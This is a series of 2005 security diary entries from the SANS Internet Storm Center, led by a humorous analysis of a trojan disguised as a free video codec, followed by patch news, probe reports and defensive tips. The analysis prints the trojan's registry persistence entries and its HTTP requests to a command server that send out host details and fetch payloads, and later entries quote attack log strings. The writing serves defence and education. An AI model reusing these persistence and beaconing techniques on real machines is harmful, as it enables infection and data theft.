It was a dark and stormy night (sorry, I always wanted to start a story that way...) and Joe Sixpack, our intrepid hero, was browsing the ‘net, looking for something that, in the interest of decorum and not setting off "nanny filters," I can’t mention. Let’s just say that it sounds a lot like the word "thorn," and leave it at that.



Joe was looking for something different. Not wildly different, mind you—nothing on the order of... uh... let’s say "animal husbandry," but something more than just the regular old... umm... anatomical studies. Joe wanted some *action*. Perhaps if he could find some video footage of legal-aged (for while Joe may be a pervert, he has some standards...) ladies and gentlemen... er... consummating their acquaintance, that would be good.



The Round-Up



Like most of your average, everyday letches, Joe heads on over to Google and does a bit o’ searching. If it’s worth finding on the Internet (and even if it ain’t), Google is the place to go. If you’ve never searched for a... uh... "thorn-related" word on Google, you’ll be awfully surprised at the shear volume of responses that you receive. One time, I was legitimately searching for a specific type of those, small, threaded fasteners... let’s just say that it was a bit difficult to separate a tiny amount of wheat from a big ol’ truck-load of chaff. But, I digress...



In any case, a little bit of searching, leads Joe an appropriate, inappropriate site.

The Hook



"Yes!" Joe says silently, as he peruses the listing of the various forms of "entertainment" that his new-found site has to offer.



What a selection it is: photos and videos of all kinds of things-- things that Joe has never even heard of. Things that would make a longshoreman blush. Men, women, birds, beasts, and devices in combinations and permutations that make an episode of Jerry Springer look like a church picnic.



Joe is in his element. He scrolls up and down the screen, looking at the listing and seeing all kinds of stuff he wants to check out. Finally, he can’t help but click on a link to one of the steamier video feeds.

The Double-Cross



But instead of watching his screen fill with undulating bodies, Joe is disappointed when the following message pops up:



"To play new format video files correctly you need to download free video codec
update (9Kb) Click here. Free codecs provided by www.vcodec.com"



(Note: Standard "Follow the Bouncing Malware" rules apply here. The link above is non-clickable for a reason: you really, REALLY shouldn’t go there. I may joke around about a lot of stuff, but not that. Don’t do it.)



Joe, being Joe, has heard something about "codecs" before. He vaguely recalls something about them being used in Windows Media Player. He is actually pretty proud of himself when he remembers that the name "codec" is a portmanteau word created from the two functions that a codec serves: COmpression and DECompression. Maybe he’s finally getting the hang of this computer stuff after all.

The Tale



Joe surfs to the VCodec site and is pleased when he sees a whole lot of information that, although he doesn’t understand it all, seems to confirm what he remembered. Yes, this "codec" thingie has something to do with compressed video.



"VCodec 1.47 FREE - New revolutionary video standard



VCodec includes a suite of powerful encoding tools enabling the highest levels of visual quality, compression and control. It plugs into your video software to produce high-quality movies (at one-tenth the size of a DVD) for viewing on your PC."

The Wire



Following that was an impressive list of "Technical Specifications" filled with technical sounding words like "Integrated Encoding Tools," "Bitrates," "Quantization," "De-interlacing" and something called "block motion compensation." It all sounded way too technical, but if he needed it to see what he needed to see, well, then, he needed it. (Say that ten time fast...) Besides, the site was very impressive and very professional looking. What could go wrong?



The Shut-Out



Joe was about ready to download the file, but there was something nagging at the back of his thoughts. Just before he clicked on the download link, it finally dawned on him: something is wrong. Back on the web page of his newest favorite site, there was a link that had said something about a "NEW updated version 3.5," and here, the VCodec site was only offering him version 1.47. What was going on?



He hadn’t clicked on the download link on that page, because he had heard that these... uh... "thornography" sites weren’t always on the up-and-up. But now, his curiosity was piqued.



Joe quickly clicked back to the video smorgasbord and carefully examined the direct download link found there. With a jaundiced eye, he looked carefully at what was displayed by his browser to make sure that the link was actually taking him to the VCodec site. It was! Ha! They weren’t going to fool him. He was going to download the new, updated version of the codec. Version 3.5 had to be way better than version 1.47.

The Sting



Joe downloaded the file and installed it. It was all very professional. First, a window popped up, explaining that the executable was going to install the VCodec software, and giving him the option to cancel the installation. Then, he was presented with one of those End User License Agreements (EULA) and was forced to agree with it if he wanted to install the software. Joe always hated that, but he did it anyway... he sort of felt hypnotized by the thought of what he would be seeing when that DVD quality video was dancing across his screen...

The Big Con



The file that Joe downloaded was "vc3_05b.exe," a 16,373 byte long executable. On the VCodec site, there is also a file called "vc1_05a.exe" (9341 bytes) which is what you get if you follow the main "download" link on the VCodec site. Also, like an extra surprise, hidden on the vcodec.com index page is some JavaScript that attempts, in several ways, to download the file "vc105a.htm" which is simply a copy of vc1_05a.exe. Both files are packed with the executable compressor FSG, and while they are superficially different, running either of them has the same result: version 3.5 just has a dog-and-pony show to go along with it.



Perhaps by now, you’ve gotten the idea that we’re not dealing with a plain old video codec here. After all, this *is* another installment of "Follow the Bouncing Malware." Well, no, it isn’t just a codec.



In fact, it isn’t a codec at all.



FSG, although it is a pain in the backside, isn’t really too much of an obstacle if you know what you’re doing. Un-packing vc3_05b.exe takes a little doing, but when you finally crack it open, it reveals plenty. Our buddy vc3_05b.exe has precious little to do with video compression, and much more to do with dropping an executable "gift" on your computer and then messing with the registry to automatically run it.



It adds two keys to the registry:



HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run



It adds the following values:



HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\uuid:
"8dffcee8-49e4-443d-8606-b0502d81421f"

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies

\explorer\run\notepad.exe: "msmsgs.exe"

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegSvr32:

"C:\WINDOWS\System32\msmsgs.exe"



It modifies these values:



HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell:
"Explorer.exe" becomes

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell:
"Explorer.exe, msmsgs.exe"



Finally (if you’re following closely, you’ve seen this one coming), it drops the file:



C:\WINDOWS\System32\msmsgs.exe



The interesting thing about vc3_05b.exe is the little show that it gives us along the way, in order to make us think that everything is legitimate and above board. Joe saw it all: a confirmation "This will install Vcodec ver 3.15. Do you wish to continue?" dialog box, and an official looking EULA signoff. The funny thing is, it all doesn’t amount to a hill of beans.



It doesn’t matter how you answer any of their questions, your system is getting whacked while you’re watching the show.



If you say you don’t want to install their software, they install their software.



If you tell them to shove their EULA where the sun don’t shine, you’re still getting msmsgs.exe installed.



Heck, if you cancel the install, it even warns you: "Setup is not complete. If you quit the setup program now, the program will not be installed. Are you sure?" And then it installs msmsgs.exe anyway.



Lovely. Pond-scum with a sense of humor.



So, what is msmsgs.exe? Is it a video codec?



Sure it is...



...and I’m the Pope.



Setting aside (for now) the possibility of a Thomas the First papacy, it turns out that msmsgs.exe is actually just a nasty little downloader Trojan. It injects itself into Windows Explorer and then contacts the site "fhgstr.com":



GET /ping.php HTTP/1.1

User-Agent: blia, nu i v sad

Host: fhgstr.com

Cache-Control: no-cache



If the fhgstr.com site replies with the ever-popular phrase:



0b723718-9389-4ca8-86f4-632a4bbc88a4



msmsgs.exe switches into "blabbermouth" mode and spills it’s guts:



GET /info.php?land=1033&uuid=7c75xb3b-955d-42ad-9xdf-17da5x645c0e

&id=192.168.74.128&osl=English%20(United%20States) HTTP/1.1

User-Agent: blia, nu i v sad

Host: fhgstr.com

Cache-Control: no-cache



telling the folks back home several interesting facts about its host. Not to be outdone in the blathering-gibberish department, fhgstr.com comes bouncing back (pun intended) with a rousing chorus of:



6e

M7081700.so|K7111600.so|DA7021900.so|X7081700.so|Z7121900.so|A6291400.so

|HP7081700.so|P7091300.so|S7081700.so

0



To the untrained eye, that might just look like gobbledygook, and indeed, that’s pretty much what it looked like to me. However, with a little bit of prodding, and tossing it the correct types of messages in the lab, msmsgs.exe knew *exactly* what to do, and proceeded to try to grab nine files with requests like the following:



GET /downloadex.php?file=M7081700.so&land=1033 HTTP/1.1

User-Agent: 029dn-2c-02cn-4n0238-402cn8304c=1-n234c-192=3-12-0jd0912093712-4917b-2c0812308b1c2038

Host: fhgstr.com

Cache-Control: no-cache



(Note: Just in case you’ve not figured it out yet, working through what these little critters do is a somewhat painstaking combination of disassembly, debugging, and behavioral analysis under lab conditions. This isn’t something that you should ever try, unless you really know what you’re doing. If you mess up, you can end up infecting non-laboratory machines… not that *I* would ever do that, mind you, but I... uh... umm... know of people who have.)



So, what presents are waiting for us when msmsgs.exe gets done with its downloads? You’ll have to wait until next week, when I’m on duty again for the next FTBM...



Here’s a hint though: at the tail end of VCodec’s EULA, there is this little gem:



"ADDENDUM: By accepting this agreement you also accept installing of free software helping you surf the web easily and get useful information in single click"



Setting aside for a moment the fact that their entire EULA looks like a really bad cut-n-paste job, why oh why can’t these people put together a decent sentence?



Another butt-covering bite o’ EULA:



"In return for the right to access this Content, you acknowledge and agree that the Software contains additional software products provided to SOFTREV by its suppliers which will periodically deliver additional Content such as, but not limited to, advertisements and promotional messages to your computer



Updates to Software.



The Software includes an automatic update feature to ensure that you have the most recently released version. You acknowledge and agree that SOFTREV or third parties designated by SOFTREV may from time to time provide automatic programming fixes, updates and upgrades to the Software (collectively, the Updates). Updates may include installation of third party applications, through automatic electronic dissemination and other means. You consent to such Updates and agree that the terms and conditions of this Agreement will apply to all such Updates. If you should elect not to have your software updated at any future time, SOFTREV shall not be responsible for any incompatibilities that may arise on your system and Computer."



Finally, I may not be able to write the next installment, because it appears that I might have, perhaps, somehow, inadvertently, without forethought or malice, accidentally, in some way (probably while under the influence of caffeine – so it’s not really my fault) violated VCodec’s EULA... especially the part that says I’m not allowed to reverse engineer their "product."



Oops... sorry ‘bout that.



Hmmm... I’ll make them a deal: when they actually have a product, I won’t reverse engineer it.


-----------------------------------------------------------------

Handler on Duty: Tom Liston (tom at intelguardians dot com)
http://www.intelguardians.com

0 Comments

Published: 2005-07-12

Microsoft patches are out; Port 80 spike; Mail bag; Firefox 1.0.5 released; Oracle and Apple too!

Happy Patch Day!



Microsoft has rated all three updates as critical.


Font Parsing Vulnerability in Word - Vulnerability CAN-2005-0564


http://www.microsoft.com/technet/security/Bulletin/MS05-035.mspx



Description:
A stack buffer overflow in the font processing process that is
part of Microsoft Word.

Links:

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0564
http://support.microsoft.com/kb/903672

Affected software:

- Office 2000 and Office XP (2002)

- Microsoft Works 2000, 2001, 2002, 2003 and 2004


Impact:

- Random code execution with rights of logged in user.

- Exploitable via email attachments (user interaction needed)

which results in worm potential.

Work arounds:

- Do not open Word attachments.

- Stop attachments at the perimeter.

Fix:
- Install MS05-35 (which updates MS05-23)

Best practice:

To prevent future problems of this kind in a layered approach, it is
suggested to:

- Use minimal rights (not administrator) when logging in on any
windows machine.

- Teach all users never to open unexpected attachments, no matter how
tempting the message surrounding it is.

- Filter office attachments coming from the internet in a perimeter,
and keep them in quarantine until it is determined they are really
needed and safe.

- Not use Microsoft word as an editor for email messages

- Considering using less widely used software as a way not to get
caught in massive exploits. This will not work well
against directed attacks.



Microsoft Security Bulletin MS05-036 -- Vulnerability in Microsoft Color
Management Module Could Allow Remote Code Execution (901214) CAN-2005-1219



http://www.microsoft.com/technet/security/Bulletin/MS05-036.mspx




Affected: Win2K, XPSP1, XPSP2, Server 2003 and Server 2003SP1
(Critical); Win98, 98SE, and ME (Important).

A flaw in validating the format tags within an image once again requires
Windows be patched. Like MS04-028 (JPEGS) and MS05-009 (PNGS), MS05-036
patches a flaw in the way that an image format is parsed which could cause an
exploitable buffer overflow. This time, the affected component is the
Microsoft Color Management Module, which is used by Windows to provide
consistent color mappings between different devices and applications and
to transform colors from one color space to another (for example, RGB to
CMYK).

Images which contain bogus ICC (International Color Consortium -- which
actually sounds like a bunch of interior decorators that meet down at
their local Starbuck's) profile format tags can cause the Color
Management Module to overflow a buffer in a way that could result in
execution of code, giving full control to an attacker.

Malicious images could be hosted on a website or sent as attachments to
email messages. It appears that HTML-email messages containing
malicious images could also be a vector.

Win2K, XP, and 2003 Server require patching. There are currently no
workarounds listed.

Win98, 98SE, and ME, while still vulnerable to the buffer overflow, do
not currently appear to be exploitable.

Note: According to MS, this vulnerability is *CURRENTLY* being exploited




MS05-037 (KB903235) - Vulnerability in JView Profiler Could Allow
Remote Code Execution




http://www.microsoft.com/technet/security/Bulletin/MS05-037.mspx




JView Profiler Vulnerability (CAN-200502987) - A newly-discovered,
public vulnerability in the JView Profiler (javaprxy.dll) which can
be instantiated in Internet Explorer contains a remote code execution
vulnerability. Microsoft reports that this COM object was not
designed to be accessed through Internet Explorer. As such this fix
will set the kill bit for the JView Profiler COM object.

This vulnerability affects Windows 98, Windows 98 SE, Windows
Millennium Edition, XP, 2000, and 2003. However, the Microsoft Java
Virtual Machine, where the JView Profiler originates, is not included
by default with Windows XP SP 1a, and SP2 , or Windows Server 2003
and Windows Server 2003 SP1 systems.

As Microsoft has received reports of this vulnerability being
exploited, the Internet Storm Center recommends that this fix be
applied quickly.

Affected software:

Windows 2000 SP4, Windows XP SP1 and 2, Windows Server 2003 and SP1,
Windows 98 and SE, Windows ME.

JView Profiler, Internet Explorer 5.01 SP4, Internet Explorer 6 and SP1,
Internet Explorer 5.5 SP2.





MS05-033 was also updated today.


http://www.microsoft.com/technet/security/Bulletin/MS05-033.mspx




The Microsoft Malicious Software Removal Tool has been updated
as well.




http://go.microsoft.com/fwlink/?LinkId=40587




Port 80 spike



http://www.dshield.org/port_report.php?port=80

Dshield is showing the beginning of what looks like a large spike in
probes to port 80. The cause is unknown at this time, but could be attributable
to any number of new vulnerabilities being exploited, a new skiddie toy, or
new worm variants.




Mail bag


Paul Jarvis wrote in to warn of probes to his web server.
"I've noticed over the last few days a number of access attempts to
/cacti/graph_image.php on my servers from a variety of addresses - most
of which track back to other webservers. I checked Packetstorm and there
were a number of exploits released this/last month for Cacti using that php file."

Another reader wrote in to warn of continued Rbot activity he had noticed.
"So far, we're up to 300 of these and climbing, coming from all over, Denmark,
Vietnam, Germany, Spain, etc..

GET / HTTP/1.0

Host: YourWebServerIP

Authorization: Negotiate YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4
IQYgOCBAEAQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF

Gonna be a fun day!"

http://isc.sans.org/diary.php?date=2005-06-03

George Bakos noted this activity in his diary June 3rd.

Mozilla Firefox 1.0.5 released.


The list of security fixes does not appear to have been updated yet.

"Firefox 1.0.5 is a security update that is part of our ongoing program to provide a safe Internet experience for our customers. We recommend that all users upgrade to this latest version."

http://www.mozilla.org/products/firefox/releases/1.0.5.html

[We finally found a listing of what this release fixes:

MFSA 2005-56 Code execution through shared function objects

MFSA 2005-55 XHTML node spoofing

MFSA 2005-54 Javascript prompt origin spoofing

MFSA 2005-53 Standalone applications can run arbitrary code through the browser

MFSA 2005-52 Same origin violation: frame calling top.focus()

MFSA 2005-51 The return of frame-injection spoofing

MFSA 2005-50 Possibly exploitable crash in InstallVersion.compareTo()

MFSA 2005-49 Script injection from Firefox sidebar panel using data:

MFSA 2005-48 Same-origin violation with InstallTrigger callback

MFSA 2005-47 Code execution via "Set as Wallpaper"

MFSA 2005-46 XBL scripts ran even when Javascript disabled

MFSA 2005-45 Content-generated event vulnerabilities

...thanks Scott! -TL]

Oracle patches



Oracle has released a collection of patches that address security
vulnerabilities.

http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html

Apple patches



Mac OS X Update 10.4.2 has been released.
"The 10.4.2 Update delivers overall improved reliability and compatibility for Mac OS X v10.4 and is recommended for all users."

http://docs.info.apple.com/article.html?artnum=301722

Thanks team!


Additional help on this diary from Scott, Tom, Erik, Swa, Kevin,

and the rest of the amazing Handler team. Thanks also to our readers and
contributors.

Today gives new meaning to Black Patch Tuesday!!






Cheers,

Adrien de Beaupré,

Handler of the day.

http://www.cinnabar.ca


0 Comments

Published: 2005-07-11

The MS Claria debate; Intrusions via MS05-017; some more light reading


Microsoft anti-spyware and the Claria debate



There's been some recent talk about Microsoft spyware classification methods and its objectivity in doing so. We received some inquiries about the Claria classification and decided to look into a bit further.


(For some background, check out the Techweb article on the subject:
http://www.techweb.com/wire/security/165701020">
http://www.techweb.com/wire/security/165701020 )


In looking a bit deeper, it appears Microsoft made a formal response to the allegations late last week. In its response (posted in a letter available
here ) Microsoft states:


"Upon review of their software against our criteria, we determined that continued detection of Claria's products was indeed appropriate. We also decided that adjustments should be made to the classification of Claria software in order to be fair and consistent with how Windows AntiSpyware (Beta) handles similar software from other vendors."


We also found the following policy doc to be a good starting point on Microsoft's anti-spyware policy and process:

"Windows AntiSpyware (Beta): Analysis approach and categories"

http://www.microsoft.com/athome/security/spyware/software/isv/analysis.mspx">
http://www.microsoft.com/athome/security/spyware/software/isv/analysis.mspx


I think it's important that folks keep an eye on these types of issues as the entire adware/spyware problem continues to evolve, but it appears that this particular round of actions were "above board."



Intrusions via MS05-017



We received a comment about MS05-017 (Message Queuing vulnerability) based attacks being successfully executed, and some questions concerning where/what installs the service in the first place. According to MS it is not installed by default with OS installations, so this might be another one of those services (like the MSDE / Visio problems of years past) that has a "stealth-install" side to it. In short, keep an eye out for this guy running on your systems...



<h4>Some light reading</h4>

Amit Klein released an article on Cross Site Scripting which attacks a user's client without sending malicious content to the web server:
http://www.webappsec.org/projects/articles/071105.shtml">
http://www.webappsec.org/projects/articles/071105.shtml


Fellow handler Scott forwarded an interesting Instant Messenger (IM) threat tracking site:
http://imlogic.com/im_threat_center/index.asp">
http://imlogic.com/im_threat_center/index.asp



Happy Monday,

-Greg

0 Comments

Published: 2005-07-10

zlib Security Vulnerability; Protecting Your Privacy


Greetings everyone, I hope you are enjoying this wonderful weekend that has been remarkably quiet. This is overall a good thing as my birthday was over the weekend and it was one of those zero ending ones that appear to be so traumatic to most. Happily, I was able to enjoy this special day with some wonderful friends and even found time to do some desperately needed cleaning of my study/computer room (of which has been called the junk room by friends in recent past). Even so, there are a couple of things that are noteworthy.
<H3> zlib Security Vulnerability

It was noted today on the zlib website today (and other locations over the past 2-3 days) that a new security vulnerability has been discovered. It appears that if one were to have a specially crafted input file, applications using zlib version 1.2.1 and 1.2.2 can crash due to th memory being overwritten. A new version of the zLib is due out soon. Keep an eye on the zlib website located at http://www.zlib.net/ for more information about the new release and how best to protect your systems from this localized form of Denial of Service.
<H3> Protecting Your Privacy

Today while doing some of the afore mentioned house cleaning, I came across the big daunting stack of newspapers that I have been meaning to go through clip items out of (like wedding announcements, funny comics, or recipes to add to my collection usually). While thumbing through one of the more recent ones, I came across an article by a local reporter about protecting your privacy on the computer.

Some of the things in this article are good, some not as much. But one of the key points I gained from this article is that the less technological competent people out do not think the same way the rest of us do. So when communicating with them is always going to be a challenge. (I am going to see if I can find a link for the article online at some point....but it may not happen today.)

In the article, the author discussed some simple steps to prevent the family computer from exposing personal secrets by a little bit of knowledge. Below is the list of steps mentioned.

1) Separate User Accounts -- By having separate user accounts, it is the author's belief that one can segment your sensitive activities in one account, and then switch accounts for general use. Personally I think this is naive to think end users would actually use separate accounts as any type of security measure.

2) Delete Internet History -- I do this regularly, though I am not sure if it is out of paranoia or to just free up disk space on my hard drive. As trained individuals can potentially recover bits of your internet history, I am far from naive to think that this action will actually do much more then clear out some of the tracking cookies on your system (if you have it delete files in the cache as well as the history), and/or keep less computer literate people from snooping as easily.

3) Delete Recent Items -- This refers to the shortcuts left behind in Windows (My Recent Documents) and OS X (Recent Items). For the same reasons in #2, I do not believe this really does much to improve your privacy.

4) Encrypt Sensitive Files -- This is the only really useful tip given in the article. The article encourages the use of the freeware version of PGP and even notes that once a file is encrypted, one cannot easily restore the file without the given password or passphrase.
Thinking through this list, it amazes me how far we still need to go to educate the general public (and those working in the mass media) about the best steps one can do, as a lowly computer user, to protect your computer. It is going to be long long battle to be able to relate some of the complex computer privacy issues to those that need to know it most.

So, I really think we can do better. I think that it is going to be up to those of us with security knowledge to find better ways to communicate things like choosing strong passwords, updating your AntiVirus and Operating System routinely, be wary of phishing emails and similar tactics. If you have some ideas, I plan to drop a note to the local reporter (and through our handlers diary in the near future) which we can use to educate end users.

0 Comments

Published: 2005-07-09

Request for Help, OOB Chat Room Keeps London Working During Attack

Good morning!


Request for Help



This morning the Handlers received a note from Ian Tomkinson that he had detected the following in their web server access logs. It caught his attention because of the "ISC.SANS.DFind" string--probably an attempt to make the traffic look legitimate.



xxx.xxx.xxx.xxx - - [08/Jul/2005:18:51:35 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:)
HTTP/1.1" 400 320 "-" "-"


This hit was followed up by a scan for phpmyadmin, using a tool called "PMAFind"


Please review your web server logs for anything with this string in it. Should you find a hit, please submit a copy of the log excerpt to http://isc.sans.org/contact.php

Update: see http://isc.sans.org/diary.php?storyid=900

Thanks!

Internet Chat Room Keeps London Trading Alive During Attack



This story caught my attention yesterday, while reading some of the coverage of the bombing attacks in London. The details are itself are simplified a bit, but the gist of it is this: many financial (and I'm sure other) institutions were able to continue operating during the crisis last week through the use of what I'd call out-of-band communications mechanisms, including websites and chat rooms, setup as a response to the terror attacks of 911. It also talks about the improved contingency planning that has occured because of the same.

One of the true stories behind these terrible events is certainly how well infrastructure bits have held up.

Food for thought: do you have any out-of-band mechanisms in case some of your major systems fail? Even something simple as a published e-mail address not hosted on your own systems may be useful. Perhaps a Jabber server, or an IRC chat room somewhere?

http://www.alertnet.org/thenews/newsdesk/L08557431.htm
-------------------------




Dave Brookshire

SANS ISC Handler-on-Duty

0 Comments

Published: 2005-07-08

London bombing trojan, update on system monitoring attempts, Updates from Microsoft coming

We have a collection of updates for you today. 3 fixes coming from Microsoft, use of the veritas flaws and more harrowing tales of my attempt to keep track of what my system does.




Microsoft updates coming


Microsoft has stated that they will be publishing three security patches on July 12th. Two for Microsoft Windows and one for Microsoft Office. At least one of the Windows updates is a Critical priority and the Office update is Critical as well.




MItM tool released for MS RDP vuln


There is now a tool that can exploit he Microsoft RDP man in the middle vulnerability from early June. There is no patch available for this though SP1 for Windows2003 should fix it. You do actually have to be able to be in the middle of the connection to make the tool work.




Compromises being reported from Veritas flaw


We have gotten a number of reports of systems being compromised via the Veritas remote agent vulnerability, if you are one of those who haven't yet patched your systems, you might want to get around to it.




US-CERT warns of targeted trojan email attempts


US-CERT has published a that they have seen an increase in the use of email as a method of spreading trojans. This is something that has been discussed for a while now and appears to be a duplicate of the warning that was sent out via other national CERTs but it is still a good read.




Email virus claiming to be news of London bombing


It seems that someone with no sense of decency has started spreading a virus via email. Consider yourselves warned. :(




More adventures in System monitoring


Last time I was on duty, I posted a rant about my frustrations with monitoring the state of my system and having confidence that I knew everything that was executing and what it was doing. In response I got a number of excellent suggestions and pointers to tools to try.


Since then I've tried a number of different products and am quite pleased to announce that although I still don't have as much visibility (and more importantly, clarity) into what my system is doing as I would like, I have managed to make background tasks take up enough system resources to cause a system with a 1.6GHz processor and a GB of RAM to crawl. And interestingly enough, it seems that battery life when in _standby_ mode drops dramatically as well.


I mentioned a couple of the tools I was going to try in my rant. Since then I've given up on all of them. Xintegrity had a nice interface but kept taking 6 hours to do a complete system analysis and then crashing near the end of the job. So much for that. Osiris is an excellent tool and had a good baseline for Windows XP, but it really didn't give me the sort of information I was looking for.


The two primary tools that I've found and am using consistently are:
and . I've started using the NoScript Extension for Firefox and really love it though the "allow scripts temporarily" seems buggy as it keeps causing Firefox to crash.


All Seeing Eye is a general system monitoring tool, it watches processes, the system startup, DLLs, log files, BHOs, ActiveX, the registry... it does tons of stuff. Unfortunately, it doesn't give a lot of information about what any changes may mean which leaves you in the position of trying to figure out how you should feel about the things it is telling you. It also eats at least 5% of your processor and because of the disk monitoring, it eats battery life in a laptop as well. I like it a lot but I don't let it run all the time, especially when not plugged in to the wall.


ProcessGuard is focused on watching the actual processes running on your system directly. This is nice as it warns you any time anything starts and also tells you how it was started and what started it (which is pretty interesting to watch). It doesn't seem to have much impact on the system except to maybe slow it a little (but not enough to notice by itself for most things). The interface is pretty good too. Overall I think it is a good addition.


Did I find what I wanted? Nope! I wanna see all the things being routed through svchost.exe and System processes, and none of these tools made me feel _really_ good about the potential for DLL insertion and other nasty things (though ASE and ProcessGuard are helping some)



If you have more suggestions, let me know. I'll try things out and report back.
Published: 2005-07-07

London, .us TLD, ...


Late Update

London Bombings



Our sympathies to all those affected by this morning's bombings in London, UK.
On behalf of the SANS ISC, we're saddened by this terrible tragedy, and feel
for your loss.

.us TLD DNS resolvability issues



We're monitoring some spotty DNS resolvability problems from a handful of
ISPs for sites in the .us zone--everything from some sites working to an entire
loss of .us visibility. The cause seems to be a confluence of internet
latency issues coupled with DNS caches storing the lack of data as
actual data, although we don't currently have an "official answer".

0 Comments

Published: 2005-07-06

Consensus gathering on log analysis and correlation in enterprise environment

Today, we solicited ideas regarding log analysis and correlation in enterprise environment. Logs in a large environment can be overwhelming, Gigs and Gigs of logs can be generated every hour by tens of thousands of devices in the environment. To get a clear picture of what's happening in the environment and to get audit trail, we must analysis and store the logs properly. Any tips and tricks on the log strategy our readers would like to share? Do you filter events before a centralized collection point? Do you attept to collect as much as possible from all devices (eg. IDS with full signature set) and then trim down the events later at your log analysis engine?
*** UPDATE ***



Claudiu Rusnac uses syslog-ng and liked its ability to sort based upon date, and also hostname. He also liked Arcsight for aggregation and correlation on all the win32, unix, firewall, router/switch, IDS logs.



Ronaldo C Vasconcellos reminded us of the great article written by Marcus Ranum as a great resource on filtering events. http://www.ranum.com/security/computer_security/papers/ai/



Chad liked Cisco MARS (formerly Protego) and agree that it is good for network based events but relatively very weak on the host side.
Chris Reynolds developed a customized ASP/SQL solution for MS servers to parse log files and store them in SQL database. It will also trigger an email alert on interesting events



Jeff Bryner summerize the logs in RSS feeds then use a RSS supported browser (such as firefox) to view as news stories.



0 Comments

Published: 2005-07-05

Quiet Day;TCP/443; Firefox GIF image handling heap overflow exploit; MS javaprxy.dll update

Quiet Day



It has been a slow day and everybody in the US enjoyed their Independence Day. I didn't see any sign of widespread exploits of the phpBB, java or Veritas vulnerability. Actually one of our readers reported a new phpBB incident, but he only submited the one script which defaced the web site defacement and notified Zone-H. Following the script, a brazilian defacer group created it. Still no sign of a new phpBB worm. If you have any sign of a new phpBB worm or wild exploit, please share this information withus.

Some of people give some ideas of Spam challenge protocol, we appreciate your submission and will post a summary at a later date. I didn't take the honor of raise the infon, maybe next handler who is Jason will take the honor.





TCP/443.



Today, we did see an increase of tcp/443 scanning. The reason is unknown, maybe a new bot, or even a new vulnerability? You can see the tcp/443 activity at the
. If you have any strange activity at tcp/443, please share it with us. We need any helpful packet, log and your feedback. You can submit through our



Update: Preliminary analysis shows that most of the 443 scanning traffic is spoofed (J.U.).



Firefox GIF image handling heap overflow exploit



The
release new exploit for Firefox. The vulnerability is due to a heap overrun error when processing a specific extension block in GIF images, which may be exploited to run arbitrary code on a vulnerable system via a web page or email message containing a specially crafted GIF image. The affected version is Firefox version 1.0.1 and prior.




MS javaprxy.dll update



Microsoft updated their
(903144) of A COM Onject (Javaprxy.dll) Internet Explorer to Unexpectedly Exit. The advisory update with Microsoft Download Center Information for the registry key update that disables Javaprxy.dll in the Explorer. But still workaround and no official patch available.








Kevin Hong


Handler on Duty.


khong-at-kisa.or.kr

Published: 2005-07-04

Happy Independence Day; Impending Storm; Spam Challenge Protocol Pros and Cons

It has been quiet Independence Holiday. It appears most of the mischief makers may be taking a break. Or are they?



Impending Storm



There has been some conversation today that we may have a storm on the horizon. It was suggested that tomorrow could be a bit lively with the announcement of PoC's affecting phpBB, Java exploits and the still lingering Veritas issue. It was suggested by one of our readers that we may want to raise the Alert level just as a wake-up call to our readers. It was decided after much discussion that we are not ready to raise it at this time. We do appreciate all of the feedback from our reader's and the positive input that we received today.



It could be interesting to see what tomorrow will bring. And to see if Kevin will have the honor of raising the yellow flag.



Spam Challenge Protocol Pros and Cons



We received an email today asking for our input on the use of Challenge Protocol to validate an email sender and prevent spam. This particular email was from one of our regular contributors. He has been having a problem with an artificial "denial of service" attack today caused by the use of email addresses from his organization being spoofed.



From his initial email:
"We received tons of challenges to authenticate e-mails sent out (which
we didn't - forged sender addresses!) from a particular product."



I can understand the frustration that this reader is experiencing. I can see the pro's and con's of this type of "validation" and I can see how this could be used to further compromise the reader's email system. I tell my customers to turn off the Auto-reply in their email systems to prevent their email address being used. I also recommend that they turn off the auto notify in their anti-virus software programs what with all of the email spoofing going on today.



So I ask you. What do you think of the use of Challenge Protocol to authenticate emails?





Happy Independence Day to all of my fellow Americans and Happy Monday to everyone else. May we all wake up tomorrow morning to just the normal activity on the net.



Deb Hale


Handler in Duty



haled@pionet.net

0 Comments

Published: 2005-07-03

Possibility for disaster?; Preparing for a storm

Late edition

Possibility for disaster?



At the Internet Storm Center, we sometimes see dark clouds gathering on the horizon. Sometimes it doesn't come to a real storm, sometimes it does. Unlike the real storm centers we don't have mathematical models to help in our predictions just yet. Main problem is that it would mean we'd have to predict human nature.

This weekend we're seeing one of these possible storms. It's still too unsubstantial to actually call it a storm but the ingredients for the recipe of disaster might be present.

As a first ingredient we have the probing and even at least one worm/botnet on the loose attacking unpatched phpBB installations. Probes we see on patched phpBB boards range from trying the highlight bug to trying to run "uname -a". Attacks on unpatched boards are more varied in nature so far. Add to that the PHP XML_RPC bugs and the unix based web server world is clearly under attack this weekend.

As a second ingredient we see the 0-day exploits and the lack of a real patch from Microsoft for the javaprxy.dll . This makes the most popular browser potentially seriously vulnerable as this exploit matures.

The final ingredient is timing: in the US it's Independence Day tomorrow, which most probably only leaves a skeleton staff at key places. And which means some of the bad guys out there might seize the opportunity to do their evil with fewer defenders on the line.

We're looking for your opinion, will it mix and brew into a storm or not?

Preparing for the storm



At the ISC we're not convinced it will come to a storm. Considering the reactions we got from you so far are mostly pointing to a storm, action might be the right thing to call for.

As with any real storm, there are things one can do, even on short notice.

A quick overview:

- patch phpBB, even if you cannot do the full upgrade, the critical part of the patch is only one line that you need to change now. Find the one line here: .

- patch XML_RPC: "pear upgrade XML_RPC" should do the trick, or visit
site for more details.

- use the workarounds from Microsoft's
. Take special care to apply the suggested actions. Alternatively some sites will prefer to switch browsers to those that cannot do ActiveX to start with.

As always the more publicity this gets and the more action is taken the less likely it becomes the storm will actually happen. That's the drawback of our self defeating prophecy.

It does feel a bit like crying wolf, but taking precautions cannot hurt.



--

